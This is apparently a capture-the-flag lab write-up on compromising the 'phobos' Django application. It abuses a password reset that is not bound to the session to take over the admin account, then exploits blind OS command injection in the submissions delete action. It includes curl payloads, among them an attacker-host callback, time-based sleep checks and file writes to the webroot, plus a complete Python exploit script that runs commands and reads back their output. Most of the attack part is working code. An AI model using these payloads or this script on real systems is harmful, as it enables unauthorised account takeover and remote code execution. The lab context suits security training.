internal-phobos.phobos.offsec


A virtual host was discovered while enumerating the Subversion repository.

┌──(kali㉿kali)-[~/…/PG_PRACTICE/phobos/svn/dev]
└─$ curl -I -X OPTIONS http://internal-phobos.phobos.offsec/
HTTP/1.1 200 OK
Date: Sun, 09 Mar 2025 15:26:29 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Allow: GET, POST, PUT, HEAD, OPTIONS
Expires: Sun, 09 Mar 2025 15:26:29 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
 
┌──(kali㉿kali)-[~/…/PG_PRACTICE/phobos/svn/dev]
└─$ curl -I http://internal-phobos.phobos.offsec/        
HTTP/1.1 200 OK
Date: Sun, 09 Mar 2025 15:26:43 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 6077
Expires: Sun, 09 Mar 2025 15:26:43 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
Vary: Cookie,Accept-Encoding
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie: csrftoken=OLOzgm4IbE1jgQwG7Sw6uCKd5WnfR6NSNXEVtxVbmnBfFkxqWEIdGMAnyaly4IvX; expires=Sun, 08 Mar 2026 15:26:43 GMT; Max-Age=31449600; Path=/; SameSite=Lax
Content-Type: text/html; charset=utf-8

Webroot

It's a login page.

Although not much is revealed on the screen, the source code of this Django application has already been enumerated.

register


That includes the /register endpoint. Creating a test account.

Authenticated and redirected to the /home endpoint.

jobs


File submission is possible through the jobs endpoint.

File Upload


The file upload feature is not implemented correctly; it doesn't upload at all. This is expected, as the source code already revealed it.

Password Reset


The password reset feature at the /account endpoint is vulnerable: it does not require the current password, and the target account is not bound to the authenticated session, so any authenticated user can reset any other user's password.

Resetting the password of the admin user works as expected. Presumably the admin user is a staff member.

Successfully authenticated as the admin user.
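The flaw described above, as an added illustration rather than the application's own source: a password-change handler that trusts the username supplied in the form and never checks the current password, beside a hardened version that binds the change to the logged-in user and verifies the old password first. The in-memory user store, the sample accounts and the PBKDF2 hashing are my assumptions for a self-contained demo; the real Django view is not shown in this write-up.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumption: any reasonable PBKDF2 work factor


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison so a wrong guess leaks nothing through timing."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def make_store() -> dict:
    """Constructed sample data: a staff account and a freshly registered user."""
    store = {}
    for name, password, is_staff in [
        ("admin", "correct horse battery staple", True),
        ("testuser", "password123", False),
    ]:
        salt, digest = hash_password(password)
        store[name] = {"salt": salt, "digest": digest, "is_staff": is_staff}
    return store


def change_password_vulnerable(store: dict, session_user: str, form: dict) -> str:
    """Mirrors the bug: any logged-in session is enough, and both the target
    username and the new password come straight from the form. There is no
    current-password check and no check that form['username'] == session_user,
    so 'testuser' can rewrite 'admin'."""
    if session_user not in store:
        raise PermissionError("login required")
    target = form["username"]
    rec = store[target]
    rec["salt"], rec["digest"] = hash_password(form["new_password"])
    return target


def change_password_fixed(store: dict, session_user: str, form: dict) -> str:
    """Hardened: the account is the one bound to the session (a username in the
    form is ignored), and the current password must verify before any write."""
    if session_user not in store:
        raise PermissionError("login required")
    rec = store[session_user]
    if not verify_password(form.get("old_password", ""), rec["salt"], rec["digest"]):
        raise PermissionError("current password incorrect")
    rec["salt"], rec["digest"] = hash_password(form["new_password"])
    return session_user


if __name__ == "__main__":
    users = make_store()
    hijacked = change_password_vulnerable(
        users, "testuser", {"username": "admin", "new_password": "pwned"}
    )
    print("vulnerable handler rewrote:", hijacked)
    users = make_store()
    try:
        change_password_fixed(
            users, "testuser", {"username": "admin", "old_password": "nope", "new_password": "pwned"}
        )
    except PermissionError as exc:
        print("fixed handler refused:", exc)
```

The two checks are independent: binding the target to the session closes the horizontal privilege escalation, and requiring the old password limits the damage of a stolen or left-open session.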

Submissions


The staff member, admin, has access to the /submissions/ endpoint, where the user can either view or delete the files present in the /var/www/html/internal/submissions/ directory.

OS Command Injection


Given that the source code shows an OS command injection vulnerability in the file parameter of the delete action, I can attempt to verify this critical vulnerability.

Network Limited


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(curl http://192.168.45.218/blah)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real

It doesn't appear to work; no HTTP request reaches Kali.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(ping -c 1 192.168.45.218)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real

Attempting to ping Kali also fails. This is probably outbound traffic being filtered by a firewall.

Confirmation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(sleep 10)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real
 
real	10.07s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(sleep 6)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real
 
real	6.07s
user	0.00s
sys	0.01s
cpu	0%

The sleep command works, and the delay tracks the argument (about 10 s for sleep 10, about 6 s for sleep 6), so this is the injected command executing rather than a slow server. The OS command injection is confirmed, but the host is network-limited: outbound HTTP and ICMP to Kali both failed.

Temporary “Shell”

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(echo OS_command_injection > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real
 
real	0.07s
user	0.00s
sys	0.01s
cpu	8%

Writing an arbitrary file to /var/www/html/internal/submissions/out.txt succeeds, which confirms the OS command injection. Since the staff user can view files in that directory through /submissions/, redirecting command output there gives a way to read results back despite the egress restriction.
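Both the time-based confirmation and the file-write "shell" above, folded into one added script that is not part of the original write-up. The host and the /submissions/ delete action are taken from the page; the CSRF_TOKEN and SESSION_ID values are placeholders for a real staff session, and the idea that out.txt can be fetched back at /submissions/out.txt is an assumption (the write-up only shows that the directory is listed by that view). The timing decision is written against an injected `send` callable so it can be exercised offline, and it deliberately requires the delay to scale with the argument, which is what separates real execution from a merely slow server.

```python
#!/usr/bin/env python3
"""Blind OS command injection against the /submissions/ delete action.

Added example, not code from the original write-up or from the target
application. Network-facing values are placeholders (assumptions).
"""
import time
import urllib.parse
import urllib.request

BASE = "http://internal-phobos.phobos.offsec"           # from the write-up
SUBMISSIONS_DIR = "/var/www/html/internal/submissions"  # from the write-up
CSRF_TOKEN = "REPLACE_WITH_CSRFTOKEN_COOKIE"            # placeholder
SESSION_ID = "REPLACE_WITH_SESSIONID_COOKIE"            # placeholder


def injection(command: str) -> str:
    """Wrap a command so the server-side shell evaluates it via $( ... )."""
    return "$(" + command + ")"


def build_body(csrf_token: str, file_value: str, action: str = "delete") -> bytes:
    """Form body for the /submissions/ POST. urlencode() percent-encodes the
    shell metacharacters ($ ( ) > and space) so the payload survives transport
    and is only interpreted once the application hands it to a shell."""
    return urllib.parse.urlencode(
        {"csrfmiddlewaretoken": csrf_token, "file": file_value, "action": action}
    ).encode()


def _request(path: str, data: bytes = None) -> urllib.request.Request:
    """Django's CSRF check needs the csrftoken cookie to match the form field,
    and the view needs the staff sessionid, so both cookies go on every call."""
    headers = {"Cookie": f"csrftoken={CSRF_TOKEN}; sessionid={SESSION_ID}"}
    if data is not None:
        headers["Content-Type"] = "application/x-www-form-urlencoded"
    return urllib.request.Request(BASE + path, data=data, headers=headers,
                                  method="POST" if data is not None else "GET")


def post_submissions(file_value: str) -> tuple:
    """POST the delete action with an attacker-controlled 'file' value and
    return (elapsed_seconds, response_body)."""
    req = _request("/submissions/", build_body(CSRF_TOKEN, file_value))
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=60) as resp:
        body = resp.read()
    return time.monotonic() - start, body


def confirm_time_based(send, delays=(6, 10), tolerance=1.0) -> bool:
    """Decide from timing alone whether the injection executes.

    `send(payload) -> seconds` is passed in so the logic runs offline in tests.
    A baseline request (`true`) measures the server's own latency; injection is
    confirmed only if every `sleep N` adds N seconds (within tolerance) on top
    of that baseline. A server that ignores the payload, or one that is slow
    on every request, fails this check.
    """
    baseline = send(injection("true"))
    for delay in delays:
        elapsed = send(injection(f"sleep {delay}"))
        if abs((elapsed - baseline) - delay) > tolerance:
            return False
    return True


def run_and_read(command: str, out_name: str = "out.txt") -> str:
    """Blind-but-readable execution: redirect stdout and stderr into the
    submissions directory, then fetch the file back through the web app.
    The read-back path /submissions/<out_name> is an assumption."""
    target = f"{SUBMISSIONS_DIR}/{out_name}"
    post_submissions(injection(f"{command} > {target} 2>&1"))
    with urllib.request.urlopen(_request(f"/submissions/{out_name}"), timeout=30) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    if confirm_time_based(lambda payload: post_submissions(payload)[0]):
        print("[+] timing signal scales with sleep argument: injection confirmed")
        print(run_and_read("id"))
    else:
        print("[-] no usable timing signal")
```

Because the egress filter blocks callbacks, the file in the submissions directory is the only output channel available here; the same two-step pattern (write output into a path the application will serve or list, then read it) is the usual fallback whenever a reverse shell cannot reach the attacker.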